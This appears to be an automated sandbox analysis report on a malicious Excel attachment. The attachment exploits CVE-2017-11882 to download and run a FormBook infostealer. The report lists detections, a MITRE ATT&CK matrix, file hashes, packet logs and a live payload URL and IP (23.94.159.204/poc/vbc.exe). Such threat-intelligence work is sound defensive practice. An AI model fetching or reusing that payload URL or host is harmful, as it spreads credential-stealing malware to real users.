    Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess

    Stealing of Sensitive Information:

    Yara detected FormBook
    Source: Yara match | File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

    Remote Access Functionality:

    Yara detected FormBook
    Source: Yara match | File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Exploitation for Client Execution 12 | Path Interception | Process Injection 112 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 111 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Information Discovery 4 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    ORDERCONFIRMATION_00001679918.xlsx | 31% | Virustotal |
    ORDERCONFIRMATION_00001679918.xlsx | 29% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

    Dropped Files

    Source | Detection | Scanner | Label
    C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 42% | Virustotal |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 20% | ReversingLabs | Win32.Trojan.Nsisx
    C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll | 15% | Virustotal |
    C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll | 2% | ReversingLabs |
    C:\Users\Public\vbc.exe | 42% | Virustotal |
    C:\Users\Public\vbc.exe | 20% | ReversingLabs | Win32.Trojan.Nsisx

    Unpacked PE Files

    Source | Detection | Scanner | Label
    4.2.vbc.exe.2770000.4.unpack | 100% | Avira | W32/Delf.I
    4.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
    5.2.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1130366
    4.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
    5.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
    5.0.vbc.exe.1c0000.1.unpack | 100% | Avira | W32/Delf.I
    5.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1130366
    5.2.vbc.exe.1c0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://www.%s.comPA | 0% | URL Reputation | safe
    http://23.94.159.204/poc/vbc.exe | 11% | Virustotal |
    http://23.94.159.204/poc/vbc.exe | 100% | Avira URL Cloud | malware

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://23.94.159.204/poc/vbc.exe | true | 11%, Virustotal; Avira URL Cloud: malware | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.%s.comPA | vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmp | false | | high
    http://nsis.sf.net/NSIS_Error | vbc.exe, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr | false | | high
    http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr | false | | high
    http://www.day.com/dam/1.0 | F76D3143.emf.0.dr | false | | high

            Contacted IPs

            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            23.94.159.204 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:491746
            Start date:27.09.2021
            Start time:21:07:28
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 29s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:ORDERCONFIRMATION_00001679918.xlsx
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winXLSX@6/16@0/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 61.3% (good quality ratio 33.6%)
            • Quality average: 45%
            • Quality standard deviation: 44.5%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xlsx
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe

            Simulations

            Behavior and APIs

            Time | Type | Description
            21:08:38 | API Interceptor | 116x Sleep call for process: EQNEDT32.EXE modified

            Joe Sandbox View / Context

            IPs

            Match | Associated Sample Name / URL | Detection | Context
            23.94.159.204 | RFQ-56676EE78675.xlsx | malicious | 23.94.159.204/nez/vbc.exe

            Domains

            No context

            ASN


            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Category:downloaded
            Size (bytes):288145
            Entropy (8bit):7.911369635258899
            Encrypted:false
            SSDEEP:6144:F8LxBsj6b2HwEll/tCJhrAqajbLGv+qRACwWBRNZP:/ObIwElpshg0aCzBV
            MD5:A9DCC61F31601E771050463C4D41CDB0
            SHA1:C26979F1842C9F2460FC9E0F9285266B0D175B49
            SHA-256:E018D5F9CE45E81A96459FA0C717DF76B2D765F24A9A472AD2CB8D13B523F562
            SHA-512:7C592E8F6042BEA65CBD5261B0150C761B4B724E61E983DC32C2E3BE62B48D1ACAC53986DB097FE4C79A597D928F8E17FFCB639B6FC45623229719136548E6A6
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Virustotal, Detection: 42%, Browse
            • Antivirus: ReversingLabs, Detection: 20%
            Reputation:low
            IE Cache URL:http://23.94.159.204/poc/vbc.exe
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1692293F.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 509x209, frames 3
            Category:dropped
            Size (bytes):16706
            Entropy (8bit):7.7803211045289515
            Encrypted:false
            SSDEEP:384:x3+Ep+jY0GYbjcRJAcb8B2dBWWWWWWW6XPApAJz+2Jn+BSNdb7q:lmVsYcb8BQWWWWWWWmnrJn+MNA
            MD5:9984958CFC3A96E32DD6042DD14440DB
            SHA1:ABC82F6AB5C1D7C8BA0CDF10CFDC1F1916F58630
            SHA-256:65EC42573985A8CDA90B901C23F8ECE366493301ADDB12ED0B86F4CD3A48756D
            SHA-512:32DA7ED1AEC317A162BBF75ADA4D500DE3058A7C0953D98CCEC0D26E98313C002AD90E3B551F755A37B58CC34EF2B675E930A634E00524AF2905F119A39F8022
            Malicious:false
            Reputation:low
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C3144A5.png
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
            Category:dropped
            Size (bytes):65050
            Entropy (8bit):7.959940260382877
            Encrypted:false
            SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
            MD5:22335141D285E599CDAEF99EABA59D5B
            SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
            SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
            SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
            Malicious:false
            Reputation:moderate, very likely benign file
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\286302FB.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
            Category:dropped
            Size (bytes):104859
            Entropy (8bit):7.948547334191616
            Encrypted:false
            SSDEEP:1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
            MD5:50B23CFD2E093C27B7624BB70EF7A825
            SHA1:788949A19E6CD30ABD7BE309A513F3D21CFC3064
            SHA-256:BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
            SHA-512:4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
            Malicious:false
            Reputation:moderate, very likely benign file
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36E70CB6.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
            Category:dropped
            Size (bytes):104859
            Entropy (8bit):7.948547334191616
            Encrypted:false
            SSDEEP:1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
            MD5:50B23CFD2E093C27B7624BB70EF7A825
            SHA1:788949A19E6CD30ABD7BE309A513F3D21CFC3064
            SHA-256:BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
            SHA-512:4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
            Malicious:false
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\608AFF49.png
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):33795
            Entropy (8bit):7.909466841535462
            Encrypted:false
            SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
            MD5:613C306C3CC7C3367595D71BEECD5DE4
            SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
            SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
            SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
            Malicious:false
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69023234.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
            Category:dropped
            Size (bytes):8815
            Entropy (8bit):7.944898651451431
            Encrypted:false
            SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
            MD5:F06432656347B7042C803FE58F4043E1
            SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
            SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
            SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
            Malicious:false
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\727091C1.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
            Category:dropped
            Size (bytes):8815
            Entropy (8bit):7.944898651451431
            Encrypted:false
            SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
            MD5:F06432656347B7042C803FE58F4043E1
            SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
            SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
            SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
            Malicious:false
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3F73A62.png
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):33795
            Entropy (8bit):7.909466841535462
            Encrypted:false
            SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
            MD5:613C306C3CC7C3367595D71BEECD5DE4
            SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
            SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
            SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
            Malicious:false
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CABA28C0.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 509x209, frames 3
            Category:dropped
            Size (bytes):16706
            Entropy (8bit):7.7803211045289515
            Encrypted:false
            SSDEEP:384:x3+Ep+jY0GYbjcRJAcb8B2dBWWWWWWW6XPApAJz+2Jn+BSNdb7q:lmVsYcb8BQWWWWWWWmnrJn+MNA
            MD5:9984958CFC3A96E32DD6042DD14440DB
            SHA1:ABC82F6AB5C1D7C8BA0CDF10CFDC1F1916F58630
            SHA-256:65EC42573985A8CDA90B901C23F8ECE366493301ADDB12ED0B86F4CD3A48756D
            SHA-512:32DA7ED1AEC317A162BBF75ADA4D500DE3058A7C0953D98CCEC0D26E98313C002AD90E3B551F755A37B58CC34EF2B675E930A634E00524AF2905F119A39F8022
            Malicious:false
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1B73268.png
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
            Category:dropped
            Size (bytes):65050
            Entropy (8bit):7.959940260382877
            Encrypted:false
            SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
            MD5:22335141D285E599CDAEF99EABA59D5B
            SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
            SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
            SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
            Malicious:false
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F76D3143.emf
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):648132
            Entropy (8bit):2.812378696555446
            Encrypted:false
            SSDEEP:3072:234UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:44UcLe0JOcXuunhqcS
            MD5:5766BE17816555642884E7C47E05A022
            SHA1:A04119A2200394234A44DA920D3EAF69B6448897
            SHA-256:76DAA4C2E93071BF16CCA081139786ED3C0B4143AF3D146BAAA98FC6EFCE1944
            SHA-512:1BA7659C0724E3A31C612FF2B6BD9987278226AC555B2EEB1229085538488AE77497FF94E7D199CE3B8C430F84D0F6905807D6D63A97BF6C8B74F526555E5EA6
            Malicious:false
            C:\Users\user\AppData\Local\Temp\9rvscd0j0b4n1ow
            Process:C:\Users\Public\vbc.exe
            File Type:data
            Category:dropped
            Size (bytes):250367
            Entropy (8bit):7.980938283317405
            Encrypted:false
            SSDEEP:6144:VNFhwVfYAwfRHQKsX8utbhrAqajbLGyKDE9fh/U2XGNFhwz:VkwJyBbhgyDWfh/U2XGC
            MD5:F817F157A6262B51A43656375EF8963C
            SHA1:F95D2338451B2259E6226A89360132108AB44E96
            SHA-256:8B49F9768520B9B451F1B5A0A4817A75C4411852DC24DEDA95BF6A8AB965DDED
            SHA-512:E394760069E3908B8984A849E3348634499C6AB2F0B91A574108B553FFC5D45108A536D9501C757DF5AE7FC167771691F2A53A7B983337BF60A6967562F53BEC
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll
            Process:C:\Users\Public\vbc.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):49152
            Entropy (8bit):6.227672422736112
            Encrypted:false
            SSDEEP:768:2iEPJiW4uUH/2fUnxzvRyMLvNdmUEKRnJyQuEA3B2lVNDQMZCiv+l08w2jIRo1iM:4PJiW41nj3TY0Civ+l0eZHVuIXxNSDqF
            MD5:8F1756B3FECE1D28C57CABFF0FDA9AB1
            SHA1:1D81CB4C36DA87BEE907656F9E77B1E5B159B3F0
            SHA-256:65EFE70F4FEAE095EA7A9497007F2307F49572A8878AC5D304B66DD3AC0DDFB0
            SHA-512:79AEAE44E83647486682A7E3BF387522FEEDDC9252766109C3A0837758F3A88DDC77BB84DE84F76742ABAD61F8A5517BA7B71E9E2DADAD274E621C44D050A040
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Virustotal, Detection: 15%, Browse
            • Antivirus: ReversingLabs, Detection: 2%
            C:\Users\user\Desktop\~$ORDERCONFIRMATION_00001679918.xlsx
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):330
            Entropy (8bit):1.4377382811115937
            Encrypted:false
            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
            MD5:96114D75E30EBD26B572C1FC83D1D02E
            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
            Malicious:true
            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            C:\Users\Public\vbc.exe
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Category:dropped
            Size (bytes):288145
            Entropy (8bit):7.911369635258899
            Encrypted:false
            SSDEEP:6144:F8LxBsj6b2HwEll/tCJhrAqajbLGv+qRACwWBRNZP:/ObIwElpshg0aCzBV
            MD5:A9DCC61F31601E771050463C4D41CDB0
            SHA1:C26979F1842C9F2460FC9E0F9285266B0D175B49
            SHA-256:E018D5F9CE45E81A96459FA0C717DF76B2D765F24A9A472AD2CB8D13B523F562
            SHA-512:7C592E8F6042BEA65CBD5261B0150C761B4B724E61E983DC32C2E3BE62B48D1ACAC53986DB097FE4C79A597D928F8E17FFCB639B6FC45623229719136548E6A6
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Virustotal, Detection: 42%, Browse
            • Antivirus: ReversingLabs, Detection: 20%

            Static File Info

            General

            File type:CDFV2 Encrypted
            Entropy (8bit):7.991141972870768
            TrID:
            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
            File name:ORDERCONFIRMATION_00001679918.xlsx
            File size:520680
            MD5:9c34f5c5e1a78c24947c3fe5fce601ea
            SHA1:727aa4c09c4c4f40d47ba87fa91921876b79f0f3
            SHA256:ff1168daa5edebf6c75a6f24573e0b1e8153156b47e9c91712f8aa7968d745db
            SHA512:8838c18cac9416a7bcac561276b7cda9eee605ea347af8cddcb87b00fec953238a89505305e792053e36858072b41b65f5325c70c4afadb02a64f743ddaeab2e
            SSDEEP:12288:fvzKH+eauZEGfWpHNP50my01T9W+SZTeZeUlwQeFzVZtu3HOFDZcu4Gs:fvGg8fwHNPOmy0/WNTeZeUlwQe+3Hc4

            File Icon

            Icon Hash:e4e2aa8aa4b4bcb4

            Network Behavior

            Network Port Distribution

            TCP Packets

            Sep 27, 2021 21:08:41.632560968 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.632632017 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.638772011 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.638874054 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.643944979 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.643996000 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.644016027 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.644037962 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.644042969 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.644054890 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.644085884 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.648397923 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.648451090 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.648452044 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.648487091 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.753173113 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.753354073 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.766885996 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766911983 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766927004 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766946077 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766966105 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.766988039 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.767065048 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.767087936 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.769582033 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.769629002 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.769706011 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.769730091 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.874247074 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.874536991 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.888874054 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.888916969 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.888936996 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.888962030 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.888987064 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.889010906 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.889034033 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.889168024 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.889194965 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.891571999 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.891707897 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.892065048 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.892122984 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:41.995589018 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:41.995794058 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.010854006 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.010986090 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011033058 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011059999 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011104107 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011152029 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011178970 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.011265039 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.011271954 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.012393951 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.012420893 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.012604952 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.012815952 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.012907028 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.015032053 CEST4916780192.168.2.2223.94.159.204
